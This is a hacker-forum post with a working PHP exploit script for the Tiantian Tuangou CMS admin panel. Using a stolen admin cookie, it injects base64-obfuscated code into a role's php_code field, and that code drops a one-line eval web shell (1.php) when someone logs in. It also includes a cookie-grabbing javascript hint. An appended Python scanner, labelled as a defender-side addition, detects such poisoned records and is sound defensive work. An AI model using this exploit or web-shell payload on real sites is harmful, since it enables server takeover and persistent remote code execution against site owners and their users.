by k4shifz[w.s.t]
bbs.wolvez.org
Last time I covered getting a shell through the Tiantian Tuangou (天天团购) back end.
Back-end injection: insert code into the database. The exp needs four parameters filled in: $host, $path, $formhash and $cookie. After it is submitted, log in on the front end to execute the code.
<?php
/*
TianTian Tuangou getshell codz by k4shifz
Team: bbs.wolvez.org
*/
$host='localhost';
$path='tttuangou';
/*
view the target role : /admin.php?mod=role_action&code=modify&id=50
get cookie : javascript:document.write(document.cookie);
*/
$formhash='596da77e66139589';
$cookie='admin cookies';
/* injection payload: stored in the role's php_code field, executed at front-end login */
$data=rawurlencode('eval(base64_decode("ZnB1dHMoZm9wZW4oJzEucGhwJywndysnKSwnPD9waHAgQGV2YWwoJF9QT1NUW2tdKTs/PicpOw=="));');
$cmd='FORMHASH='.$formhash.'&id=50&is_admin=0&php_code='.$data.'&name=%B5%C7%C2%BD%CF%B5%CD%B3&allow_all=1&role_ids%5B%5D=1&role_ids%5B%5D=3&role_ids%5B%5D=4&role_ids%5B%5D=5&role_ids%5B%5D=6&role_ids%5B%5D=2&role_ids%5B%5D=7&module=login&action=dologin%7C&log=0&message=&describe=&update_value%5Bcredits%5D=0&require_value%5Bcredits%5D=0&detailsubmit=%CC%E1+%BD%BB';
$fs=fsockopen($host,'80');
fputs($fs,'POST /'.$path.'/admin.php?mod=role_action&code=domodify HTTP/1.0
Referer:http://'.$host.'/'.$path.'/admin.php?mod=role_action&code=modify&id=50
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: '.$host.'
Content-Length: '.strlen($cmd).'
Cookie: '.$cookie.'
'.$cmd);
fclose($fs);
file_get_contents("http://{$host}/{$path}/index.php?mod=login");
exit("ok\nhttp://{$host}/{$path}/1.php k\n");
?>
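Added here as a defender-side check, not part of the original post or of the Tiantian Tuangou code: the bug above is a role-edit request (mod=role_action&code=domodify) whose php_code field is stored and later executed at login, so an audit of those requests (or of the stored role records) can flag dynamic-execution and file-writing constructs, including ones hidden inside a base64_decode() literal. Sample requests are constructed; the parameter names match the post, the base64 blobs are harmless constructed PHP.

```python
import base64
import re
from urllib.parse import parse_qs, quote

# PHP constructs that have no business in a role's login-hook code field.
DANGEROUS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"fopen|fputs|fwrite|file_put_contents|base64_decode)\s*\(", re.I)
# String literal handed to base64_decode(): the encoded text is what really runs.
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def scan_php_code(code: str) -> list:
    """Return the sorted set of flagged constructs found in a php_code value."""
    hits = {m.group(1).lower() for m in DANGEROUS.finditer(code)}
    for blob in B64_ARG.findall(code):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64: the outer base64_decode hit is still reported
        hits.update("decoded:" + m.group(1).lower() for m in DANGEROUS.finditer(inner))
    return sorted(hits)


def audit_request(url: str, body: str) -> dict:
    """Audit one admin request (path+query, raw POST body) for a poisoned php_code."""
    if "mod=role_action" not in url or "code=domodify" not in url:
        return {"suspicious": False, "role_id": "", "hits": []}
    fields = parse_qs(body, keep_blank_values=True)
    code = "".join(fields.get("php_code", []))
    hits = scan_php_code(code)
    return {"suspicious": bool(hits), "role_id": fields.get("id", [""])[0], "hits": hits}


# Constructed samples: same request shape as the post, harmless payloads.
SAMPLE_URL = "/tttuangou/admin.php?mod=role_action&code=domodify"
INJECTED_BODY = ("FORMHASH=0000000000000000&id=50&php_code="
                 + quote('eval(base64_decode("ZWNobyAnaGknOw=="));')  # echo 'hi';
                 + "&module=login&action=dologin%7C")
BENIGN_BODY = ("FORMHASH=0000000000000000&id=50&php_code="
               + quote("$u = $user['name'];") + "&module=login&action=dologin%7C")

if __name__ == "__main__":
    print(audit_request(SAMPLE_URL, INJECTED_BODY))  # suspicious, hits eval/base64_decode
    print(audit_request(SAMPLE_URL, BENIGN_BODY))    # not suspicious
```

The same scan_php_code() can be run straight over the php_code column of the role table to find records that were already poisoned.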
The front end still has quite a few problems as well; black-box testing could probably turn them all up.